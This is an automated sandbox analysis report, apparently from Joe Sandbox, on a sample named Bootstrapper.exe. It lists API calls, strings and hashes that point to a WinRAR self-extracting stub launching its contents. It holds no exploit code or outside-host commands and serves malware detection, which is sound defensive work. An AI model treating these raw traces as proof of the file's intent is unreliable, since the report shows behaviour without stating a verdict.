Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
Instruction ID: 98028b782e80634fce231fc93cc8e5a7b50ef26e1184fd5c4eb36755bfda7099
Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
Instruction Fuzzy Hash: 28C08C32F0480C8E8F80EBCCB0016ECB7F0EB9C221F042037D11DE3150DE2024504B90

Non-executed Functions

Function 00007FFD9B614928 Relevance: .9, Instructions: 878COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4deab1ec9d19aa51b59c103f4903e57d024dae11bc0b797b38435903e442af3
Instruction ID: 97d335c8b000b8c2620fc929dd2e35db5aaf2172cc8a49d3ad2c984af40f2a08
Opcode Fuzzy Hash: c4deab1ec9d19aa51b59c103f4903e57d024dae11bc0b797b38435903e442af3
Instruction Fuzzy Hash: 2042E331B0DA4D4FF7A9AB6C886567877E1FF99300F1501BAD05DCB2A2DE29BC428741

Function 00007FFD9B6185FA Relevance: 5.1, Strings: 4, Instructions: 93COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B6185FA
N_^, xrefs: 00007FFD9B618622
N_^#, xrefs: 00007FFD9B6186C2
N_^$, xrefs: 00007FFD9B6186CA

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^#$N_^$
API String ID: 0-422789674
Opcode ID: aac60cb5d08bd0a490cd434c008895ff41edf6501a32abcb84458b8e32e11747
Instruction ID: c0d863bcb1c3d37189cb867d8ea80d6d9ffa2abde51070f43e0e2eb573d65717
Opcode Fuzzy Hash: aac60cb5d08bd0a490cd434c008895ff41edf6501a32abcb84458b8e32e11747
Instruction Fuzzy Hash: E0310D73F1E66A4AE336569968340E9E790AF51364B4B15F7C27DDB0E3EC14390402C7

Function 00007FFD9B618BFA Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B618C6A
N_^, xrefs: 00007FFD9B618C2A
N_^, xrefs: 00007FFD9B618C12
N_^, xrefs: 00007FFD9B618C7A

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 71ecd9533cfdad4f97505e50061a430d147788c248c2941f38fe0289ade7f942
Instruction ID: 9f703342ed69ea8ee6308a09cb95d018ac59bb83b8495bf78a6b1c1afea54f27
Opcode Fuzzy Hash: 71ecd9533cfdad4f97505e50061a430d147788c248c2941f38fe0289ade7f942
Instruction Fuzzy Hash: FB2180B3E0B6964FE3564B6E8CB94953BD0FF2075834F10B5C1A98F1A3EE147A468642

Function 00007FFD9B618BF8 Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B618C6A
N_^, xrefs: 00007FFD9B618C2A
N_^, xrefs: 00007FFD9B618C12
N_^, xrefs: 00007FFD9B618C7A

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 2354607df5a2fa8dd024752f992f7071ed6ccce1c3c29f194a95809f7413bade
Instruction ID: b4aadfdcc028bddff900f34a849dca6d8621ad779d5068dee4a4a864d900165d
Opcode Fuzzy Hash: 2354607df5a2fa8dd024752f992f7071ed6ccce1c3c29f194a95809f7413bade
Instruction Fuzzy Hash: 6221B1B3E0B6964FE3564B6E8C794913BD0FF2075834F40F5C0A98F1A3EE1476468242

Analysis Process: Bootstrapper.exePID: 7492, Parent PID: 7384COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	1498
Total number of Limit Nodes:	43

Executed Functions

Function 00E1DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E10863: GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF

Part of subcall function 00E1A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E1A655

Part of subcall function 00E1AC16: OleInitialize.OLE32(00000000), ref: 00E1AC2F
Part of subcall function 00E1AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
Part of subcall function 00E1AC16: SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70

GetCommandLineW.KERNEL32 ref: 00E1DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E1DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E1DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00E1DFCE

Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30

CloseHandle.KERNEL32(00000000), ref: 00E1DFD7
GetModuleFileNameW.KERNEL32(00000000,00E5EC90,00000800), ref: 00E1DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00E5EC90), ref: 00E1DFFE
GetLocalTime.KERNEL32(?), ref: 00E1E009
_swprintf.LIBCMT ref: 00E1E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E1E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00E1E061
LoadIconW.USER32(00000000,00000064), ref: 00E1E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00E1E0C9
Sleep.KERNEL32(?), ref: 00E1E0F7
DeleteObject.GDI32 ref: 00E1E130
DeleteObject.GDI32(?), ref: 00E1E140
CloseHandle.KERNEL32 ref: 00E1E183

Strings

xz, xrefs: 00E1E10B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00E1E039
sfxname, xrefs: 00E1DFF9
winrarsfxmappingfile.tmp, xrefs: 00E1DF77
STARTDLG, xrefs: 00E1E0BE
C:\Users\user\Desktop, xrefs: 00E1DF33
sfxstime, xrefs: 00E1E055

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
API String ID: 3049964643-271953491
Opcode ID: 87b514ffb2ad2933ddc606b39680c8e6a97cacc81b7bed1e1f8d9071554f4389
Instruction ID: ddaf07f152632c180e3eb3d80294fe3337d91dcb7a42857b1cd2d27804c01ff4
Opcode Fuzzy Hash: 87b514ffb2ad2933ddc606b39680c8e6a97cacc81b7bed1e1f8d9071554f4389
Instruction Fuzzy Hash: 53612A71605304BFD324AB72EC49FAB7BECAB45705F041429F945B2292DB7499CCC761

Function 00E1A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
GlobalLock.KERNEL32(00000000), ref: 00E1A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6

Part of subcall function 00E1A626: GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
GlobalFree.KERNEL32(00000000), ref: 00E1A7CD

Strings

Fjun, xrefs: 00E1A762
PNG, xrefs: 00E1A6C6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: Fjun$PNG
API String ID: 211097158-1136719808
Opcode ID: 9a9d9abe1534cd71df5c01611d1bce45e4d2e600a474783233d9143307d6977b
Instruction ID: 14b67041cfec8f4027acf423a616415bbac7d4e9faf34e0d135400daec4db64e
Opcode Fuzzy Hash: 9a9d9abe1534cd71df5c01611d1bce45e4d2e600a474783233d9143307d6977b
Instruction Fuzzy Hash: 8D31B275502306AFC7209F32EC48D6BBFB8EF84765B04152AF805E2260EB31DD888A51

Function 00E0A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4

Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A728
GetLastError.KERNEL32(?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A734

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
Instruction ID: 14e321851a45c1e20f941e85d358b730e5d0c3850360f7881f4c6d459b4f3433
Opcode Fuzzy Hash: c3e4a687482a80d49879a7f3922dc6aa67fc588a40b385e35ae4e42a6a14442b
Instruction Fuzzy Hash: 5F413072900619ABCB29DF68CC88AE9B7B9FB48350F1841A6F559F3240D7346ED4CF91

Function 00E27DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00E27DC4,00000000,00E3C300,0000000C,00E27F1B,00000000,00000002,00000000), ref: 00E27E0F
TerminateProcess.KERNEL32(00000000,?,00E27DC4,00000000,00E3C300,0000000C,00E27F1B,00000000,00000002,00000000), ref: 00E27E16
ExitProcess.KERNEL32 ref: 00E27E28

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
Instruction ID: 00605961d3cb0bb1f275bb46620ff6e59558e1226ae61e254f7d1803a35fe58a
Opcode Fuzzy Hash: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
Instruction Fuzzy Hash: FEE04631001158EFCF026F61ED0DE4A3FAAEB40341B054498F849AA132CB36DE96EAA0

Function 00E0848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E08493

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d71d8ee2b00991d07d8d886cb4b64e6ef63efa8a98ff3c680782027550fc39db
Instruction ID: aab9c6c0e6a6789646d4a140e94900ab48ae3085cd11c26cc481556feb4b079f
Opcode Fuzzy Hash: d71d8ee2b00991d07d8d886cb4b64e6ef63efa8a98ff3c680782027550fc39db
Instruction Fuzzy Hash: C782F970904245AEDF15DF64C991BFABBB9AF15304F0861B9D889BB2C3DB315AC4CB60

Function 00E1B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E1B7E5

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B8EF
IsDialogMessageW.USER32(?,?), ref: 00E1B902
TranslateMessage.USER32(?), ref: 00E1B910
DispatchMessageW.USER32(?), ref: 00E1B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E1B93D
EndDialog.USER32(?,00000001), ref: 00E1B960
GetDlgItem.USER32(?,00000068), ref: 00E1B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1B99E
SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1B9B1

Part of subcall function 00E1D453: _wcschr.LIBVCRUNTIME ref: 00E1D45C
Part of subcall function 00E1D453: _wcslen.LIBCMT ref: 00E1D47D

SetFocus.USER32(00000000), ref: 00E1B9B8
_swprintf.LIBCMT ref: 00E1BA24

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

Part of subcall function 00E1D4D4: GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
Part of subcall function 00E1D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E1BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00E1BA90
GetTickCount.KERNEL32 ref: 00E1BAAE
_swprintf.LIBCMT ref: 00E1BAC2
GetLastError.KERNEL32(?,00000011), ref: 00E1BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00E1BB43
_swprintf.LIBCMT ref: 00E1BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E1BBD0
GetCommandLineW.KERNEL32 ref: 00E1BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E1BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00E1BC6F
Sleep.KERNEL32(00000064), ref: 00E1BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E1BCE2
CloseHandle.KERNEL32(00000000), ref: 00E1BCEB
_swprintf.LIBCMT ref: 00E1BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BD7D
SetDlgItemTextW.USER32(?,00000065,00E335F4), ref: 00E1BD94
GetDlgItem.USER32(?,00000065), ref: 00E1BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00E1BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E1BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BE68
_wcslen.LIBCMT ref: 00E1BEBE
_swprintf.LIBCMT ref: 00E1BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E1BF4C
GetDlgItem.USER32(?,00000068), ref: 00E1BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E1BF6B
GetDlgItem.USER32(?,00000066), ref: 00E1BF85
SetWindowTextW.USER32(00000000,00E4A472), ref: 00E1BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E1C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00E1C0BD
EnableWindow.USER32(00000000,00000000), ref: 00E1C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E1C1D9

Part of subcall function 00E1C73F: __EH_prolog.LIBCMT ref: 00E1C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C1FD

Strings

LICENSEDLG, xrefs: 00E1C0B2
STARTDLG, xrefs: 00E1B801
^, xrefs: 00E1C1E1
C:\Users\user\Desktop, xrefs: 00E1BBC9
"%s"%s, xrefs: 00E1BD0D
Q, xrefs: 00E1BBBC
h, xrefs: 00E1BCA5
-el -s2 "-d%s" "-sp%s", xrefs: 00E1BB6B
%s, xrefs: 00E1BED8
@, xrefs: 00E1BB91
__tmp_rar_sfx_access_check_%u, xrefs: 00E1BAB5
winrarsfxmappingfile.tmp, xrefs: 00E1BBA6
PDu<, xrefs: 00E1BC6F
<, xrefs: 00E1BB84

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
API String ID: 4093411769-4153176784
Opcode ID: 54a215b9a5f6dd79b2673a7752e34a99276d6387126f59acb3dcebb945f75df2
Instruction ID: 59ad68a8886633105d7f6f983b70235ba00cd2c803fd375692947d051b60b1de
Opcode Fuzzy Hash: 54a215b9a5f6dd79b2673a7752e34a99276d6387126f59acb3dcebb945f75df2
Instruction Fuzzy Hash: 0542F670984244BEEB219B71AD4AFFE77BCAB02744F142095F640F61D2CBB55AC9CB21

Function 00E10863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E10B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E10B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00E10BB1
CloseHandle.KERNEL32(00000000), ref: 00E10C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00E10C72
GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00E10C9C
GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00E10CD8

Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858

_swprintf.LIBCMT ref: 00E10D4A
_swprintf.LIBCMT ref: 00E10D96

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

AllocConsole.KERNEL32 ref: 00E10D9E
GetCurrentProcessId.KERNEL32 ref: 00E10DA8
AttachConsole.KERNEL32(00000000), ref: 00E10DAF
_wcslen.LIBCMT ref: 00E10DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E10DD5
WriteConsoleW.KERNEL32(00000000), ref: 00E10DDC
Sleep.KERNEL32(00002710), ref: 00E10DE7
FreeConsole.KERNEL32 ref: 00E10DED
ExitProcess.KERNEL32 ref: 00E10DF5

Strings

d?, xrefs: 00E109FE
>, xrefs: 00E109C7
?, xrefs: 00E10A35
(=, xrefs: 00E1092F
H?, xrefs: 00E109F3
0A, xrefs: 00E10ACF
,@, xrefs: 00E10A56
<, xrefs: 00E10917
0?, xrefs: 00E109E8
DXGIDebug.dll, xrefs: 00E108FC, 00E10C5E
,<, xrefs: 00E108E7
A, xrefs: 00E10B1C
4B, xrefs: 00E10B3D
dA, xrefs: 00E10AE5
HA, xrefs: 00E10ADA
H@, xrefs: 00E10A61
|@, xrefs: 00E10A77
T=, xrefs: 00E1093F
`@, xrefs: 00E10A6C
kernel32, xrefs: 00E10873
@, xrefs: 00E10AAE
dwmapi.dll, xrefs: 00E10927, 00E10D0D
|?, xrefs: 00E10A09
P>, xrefs: 00E10997
h=, xrefs: 00E10947
SetDefaultDllDirectories, xrefs: 00E108B9
uxtheme.dll, xrefs: 00E10D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00E10D84
h>, xrefs: 00E1099F
|<, xrefs: 00E10B9E, 00E10BA2
8>, xrefs: 00E1098F
D=, xrefs: 00E10CB9, 00E10CC9
SetDllDirectoryW, xrefs: 00E10888

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
